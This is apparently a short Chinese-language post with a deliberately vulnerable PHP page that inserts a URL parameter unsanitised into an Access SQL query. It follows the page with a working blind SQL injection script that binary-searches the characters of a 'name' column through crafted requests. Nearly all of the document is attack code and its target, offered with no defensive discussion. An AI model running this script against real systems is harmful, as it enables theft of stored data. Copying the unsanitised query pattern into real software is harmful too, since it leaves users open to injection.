- <?php
- $conn = new com("ADODB.Connection");
- $connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=". realpath("data.mdb");
-
- $conn->Open($connstr);
- $rs = new com("ADODB.RecordSet");
- $sql="select * from news where id=".$_GET[id];
- $rs->Open($sql,$conn,1,1);
- if(! $rs->eof) {
- echo "{ok}";
- } else{
- echo "{no}";
- }
- ?>
存在注射的。但是没有输出结果,只是判断是否存在。
- <?php
-
- error_reporting(7);
- ini_set('max_execution_time', 0);
-
- function send(){
- global $host,$cmd;
- //$cmd .= "";
- $message = "GET /b.php?id=".$cmd." HTTP/1.1\r\n";
- $message .= "Accept: */*\r\n";
- $message .= "Accept-Language: zh-cn\r\n";
- $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $message .= "Host: $host\r\n";
- $message .= "Connection: Close\r\n\r\n";
-
- $fp = fsockopen($host, 80);
- fputs($fp, $message);
-
- $resp = '';
-
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- preg_match('/\{ok\}/', $resp, $pre);
- if ($pre) return true;
- }
-
- function Binsearch($sql){
- global $cmd;
- $low="32";
- $high="128";
- while($low<=$high){
- $mid=intval(($low+$high)/2);
- $cmd= $sql."=".$mid;
- echo "$mid";
- if(send()){echo "Lucky\r\n";return $mid;}
- $cmd= $sql."<".$mid;
- if(send()){
- $high=$mid-1;
- echo "Bigger\r\n";
- }else{
- $low=$mid+1;
- echo "Smaller\r\n";
- }
- }
- return(-1);
- }
-
- $host="127.0.0.1:8080";
- $sql="15%20and%20asc(left(name,1))";
- echo Binsearch($sql);
- ?>
|
